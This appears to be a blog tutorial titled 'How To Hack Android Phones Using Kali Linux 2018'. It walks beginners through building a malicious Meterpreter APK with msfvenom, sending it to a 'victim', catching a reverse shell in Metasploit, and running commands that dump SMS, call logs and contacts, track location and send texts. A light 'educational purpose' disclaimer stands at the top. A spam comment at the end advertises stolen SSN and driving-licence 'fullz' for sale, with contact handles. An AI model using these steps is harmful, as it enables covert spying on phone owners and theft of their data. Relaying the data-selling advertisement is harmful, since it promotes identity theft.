How To Hack Android Phones Using Kali Linux 2018
If you want to learn to hack android phone, then this article is for you guys! And do not worry if you begineer, I'll show you step by step .Just read the full article.
Warning:- This Hack is to aware you, and learn this only for Educational Purpose. and Don’t try to do any illegal activity.
Requirements:
1. Kali Linux installed.
2. An Android phone.
STEPS
1. Open Terminal in Kali Linux.
2.We'll use MSFVENOM to create a malicious apk file which is to be installed on the victims android phone.
3.Paste the command,
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.xx.xx R> root/techcsnerd.apk
make sure to replace "1792.168.xx.xx" to your own local IP address.
4. Now open the root folder and send the techcsnerd.apk to the victim.
5. Open a new terminal and enter “msfconsole.”
6.After opening Metasploit console type these following commands which are used to create payload handler which will create a connection between the victim and Kali PC.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.xx.xx exploit
make sure to replace "192.168.xx.xx" to your own local Ip address.
7.Lauch the apk file on android phone.
8. After launching the application in android phone, you will get a interpreter session. Now open the MSF console terminal and use session -i 1command to access the session.
9. In the meterpreter session, you can use various commands that are given below to play different types of tricks on the victim phone like capturing a photo, screenshot, call logs,SMS logs, sending an SMS.
Command Descriptions:dump_calllog Get call log
check_root Check if device is rooted
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
dump_contacts Get contacts list
wlan_geolocate Get current lat-long using WLAN informationnterval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
sqlite_query Query a SQLite database from storage
set_audio_mode Set Ringer Mode
activity_start Start an Android activity from a Uri string
And don't close the msfconsole terminal.
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**PRICE FOR ONE LEAD/FULLZ 2$**
All SSN's are Tested & Verified. Fresh spammed data.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Minimum buy 25 to 30 leads/fullz
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040